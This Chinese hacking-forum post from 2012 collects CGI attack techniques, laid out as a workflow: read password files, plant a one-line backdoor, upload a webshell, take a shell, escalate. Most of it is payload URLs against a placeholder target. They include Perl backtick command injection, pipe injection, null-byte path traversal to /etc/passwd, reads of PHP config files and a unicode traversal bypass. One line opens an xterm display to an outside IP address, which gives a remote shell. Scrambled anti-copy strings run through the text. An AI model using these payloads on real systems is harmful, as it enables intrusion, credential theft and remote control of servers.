找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3078|回复: 0
打印 上一主题 下一主题

CGI资料整理

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:56:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着  
) d. t' p# N; I6 m8 jcookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权  
' g0 r. u7 G) O' y: o5 G& h0 F: ]感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们  / O5 P% h0 W; |, \) K4 h
注“  
* E+ R; g/ A0 C+ A* Z- vperl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。  
3 U& Y* M0 H7 I' @+ O. {5 L/ t以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET  
' O' L" G. I. u8 G( u  }: f3 Z/ c9 E# x/ p5 t( W! T7 a. z
http://target.com/cgi-bin/home/news/sub.pl?12 随意构造  ( M$ u3 K2 u6 ?7 O' }0 j5 S
http://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢  
# f$ Q) d9 M5 _; q3 Mhttp://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号  5 I- [" ?; W2 k5 f/ Q' O9 S
http://target.com/cgi-bin/home/news/sub.pl?`id`  3 R. m! X9 j0 [1 i$ v
http://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`  4 B# q6 d+ {" Y5 \% \' n8 ]: {
http://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示  5 V* _$ H' V9 P7 F

: P: N: y  G' e+ P' ?* B3 I0 H+ V! Rhttp://target.com/test.pl;ls|  ' c* m5 Q) s4 [0 P2 s  J
http://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|  
7 a6 |( |* b' D( phttp://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|  
! J1 M7 s' f: ~8 Uhttp://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造  1 V+ I, z2 u% m$ R" P
比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。  ( }- q7 \7 `, N* I2 O* w
http://target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection  
& x% X, _3 c% n- ]4 i3 G/ _& e8 p2 x1 r; G, |! k5 y
http://target.com/test.pl?&........ /../../etc/passwd  4 I, T  I. _  _" O
! Y4 m/ U3 G7 r
http://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./  
6 k) Z' j7 p, y" a& x' `# g5 Rhttp://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了  / l% \1 s! ^: j7 A4 |3 r: Z5 M& q
http://www.target.org/cgi-bin/cl ... ../../etc/passwd%00  
8 C' }( U4 \7 z  t
$ d! \8 q& ~5 O( k* t  Y; H4 Rhttp://www.target.org/show.php?f ... /include/config.php 查看php代码  / J4 X$ W% t# G8 H9 A' {0 H6 L7 A
http://www.target.org/show.php?f ... ng/admin/global.php  2 o6 K  u& s0 a6 B$ `8 `& E
8 Z1 o$ q3 H7 j; ?) ~0 E2 [
emm和ps的一句话4 g0 R* a+ ]% o/ z; W: E9 v9 r

2 w$ B# [; v7 t% N4 v* J  i& {http://www.target.org/cgi-bin/cl ... /../../../bin/ls%20  
  m) G" C9 z& _/ g! t
( I' H4 F) U, W2 H2 ?>bbb%20|  ! _4 ~: t( I8 N) a/ J
3 x7 y0 N( K% x: j
http://www.target.org/cgi-bin/club/scripts\’less showpost.pl\’ 并且寻找(用\’/\’)\’Select\’ 字符串  
. B- [& S8 L4 j" `' t* G' G8 A- y/ n; I% c1 h) H1 R* t, w
http://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征  4 p9 M% q3 T( H6 F: G! L7 k
http://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin  5 m8 H  Z& g& I* _! Y

. F& T- f8 e9 ^/ u( ]相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法  
; ~; w7 h7 b: Z9 thttp://target.com/index.html#cmd.exe  
0 D& o# w' Z' M% Zhttp://target.com/index.html?dummyparam=xp_cmdshell  
& S6 T) d1 _' v: l1 H" Jlynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd  ! t6 F7 V$ l8 J0 D
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表